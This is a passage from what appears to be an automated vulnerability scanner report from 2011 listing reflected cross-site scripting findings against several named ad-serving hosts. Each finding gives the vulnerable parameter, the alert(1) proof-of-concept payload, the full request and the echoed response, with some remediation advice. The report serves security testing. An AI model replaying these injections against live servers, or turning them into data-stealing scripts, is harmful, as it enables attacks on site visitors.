document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2048146_1080838_300x160_1136436_2048146&af=1120340&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2048146&ml_camp=1076702&ml_crid=2148579&click=efd5b';alert(1)//b9c84530d46http://www.nbc.com/up-all-night/" TARGET="_blank">
...[SNIP]...

3.2. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9121b'-alert(1)-'fc30105dd5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2048146_1080838_300x160_1136436_2048146&ML_NIF=N&target=_blank&@CPSC@=&9121b'-alert(1)-'fc30105dd5d=1 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=OPT_OUT

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:20:53 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
x_transtrans: 42.6.10.688
Set-Cookie: PrefID=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCursor=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCPrf=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLDup=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CSList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CTList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: XGIR=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Content-Type: application/x-javascript
Content-Length: 452
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2048146_1080838_300x160_1136436_2048146&af=1120340&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2048146&ml_camp=1076702&ml_crid=2148579&click=&9121b'-alert(1)-'fc30105dd5d=1http://www.nbc.com/up-all-night/" TARGET="_blank">
...[SNIP]...

3.3. http://ad.adlegend.com/jscript [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab84'%3balert(1)//f4b857f52a7 was submitted in the target parameter. This input was echoed as 9ab84';alert(1)//f4b857f52a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2048146_1080838_300x160_1136436_2048146&ML_NIF=N&target=_blank9ab84'%3balert(1)//f4b857f52a7&@CPSC@= HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=OPT_OUT

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:20:50 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
x_transtrans: 42.6.10.688
Set-Cookie: PrefID=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCursor=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCPrf=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLDup=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CSList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CTList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: XGIR=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Content-Type: application/x-javascript
Content-Length: 449
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2048146_1080838_300x160_1136436_2048146&af=1120340&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2048146&ml_camp=1076702&ml_crid=2148579&click=http://www.nbc.com/up-all-night/" TARGET="_blank9ab84';alert(1)//f4b857f52a7">
...[SNIP]...

3.4. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21da1"><script>alert(1)</script>a1f0873c55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=2551311&bur=81736&x=http://www.burstnet.com/ads/ad18241a-map.cgi/BCPG175221.253830.503405/VTS=3X3qJ.u_y6/SZ=300X250A/V=2.3S//ST=0Ok20i9I10y320qZ1oPTEB2_3S02vc02vc/REDIRURL=&21da1"><script>alert(1)</script>a1f0873c55=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.multiplayergames.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 20:47:20 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 05 Oct 2011 20:47:20 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 5345

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.burstdirectads.com/imageclick?21da1"><script>alert(1)</script>a1f0873c55=1&Z=300x250&bur=81736&s=2551311&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad18241a%2dmap.cgi%2fBCPG175221.253830.503405%2fVTS%3d3X3qJ.u%5fy6%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Ok20i9I10y320qZ1oPTEB2%
...[SNIP]...

3.5. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b318"-alert(1)-"43e5161bf84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=2551311&bur=81736&x=http://www.burstnet.com/ads/ad18241a-map.cgi/BCPG175221.253830.503405/VTS=3X3qJ.u_y6/SZ=300X250A/V=2.3S//ST=0Ok20i9I10y320qZ1oPTEB2_3S02vc02vc/REDIRURL=&7b318"-alert(1)-"43e5161bf84=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.multiplayergames.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 20:47:20 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 05 Oct 2011 20:47:20 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 5303

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.burstdirectads.com/imp?7b318"-alert(1)-"43e5161bf84=1&Z=300x250&bur=81736&s=2551311&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad18241a%2dmap.cgi%2fBCPG175221.253830.503405%2fVTS%3d3X3qJ.u%5fy6%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Ok20i9I10y320qZ1oPTEB2%
...[SNIP]...

3.6. http://ads.pointroll.com/PortalServe/ [dom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b2b1"%3balert(1)//d406693461b was submitted in the dom parameter. This input was echoed as 9b2b1";alert(1)//d406693461b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10&time=3|13:21|-5&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://www.nbcnewyork.com9b2b1"%3balert(1)//d406693461b&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1409315' src='http://ads.pointroll.com/PortalServe/?pid=1409315L44120110908171336&cid=1512616&pos=h&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B2435049
...[SNIP]...
=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$&dom=http://www.nbcnewyork.com9b2b1";alert(1)//d406693461b&time=3|13:21|-5&r=0.38880528369918466&flash=10&server=polRedir' width='300' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.7. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da339'%3balert(1)//9d27b7a2543 was submitted in the flash parameter. This input was echoed as da339';alert(1)//9d27b7a2543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10da339'%3balert(1)//9d27b7a2543&time=3|13:21|-5&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://www.nbcnewyork.com&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.nbcnewyork.com/includes/PointRollAds.htm?pid=1409315L44120110908171336&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-30
...[SNIP]...
Bsub2=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$&time=3|13:21|-5&flash=10da339';alert(1)//9d27b7a2543&server=portalserve&bu=437627563');

3.8. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ef9e'-alert(1)-'3f0794b59ee was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10&time=3|13:21|-5&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$9ef9e'-alert(1)-'3f0794b59ee&pos=x&dom=http://www.nbcnewyork.com&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.nbcnewyork.com/includes/PointRollAds.htm?pid=1409315L44120110908171336&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-30
...[SNIP]...
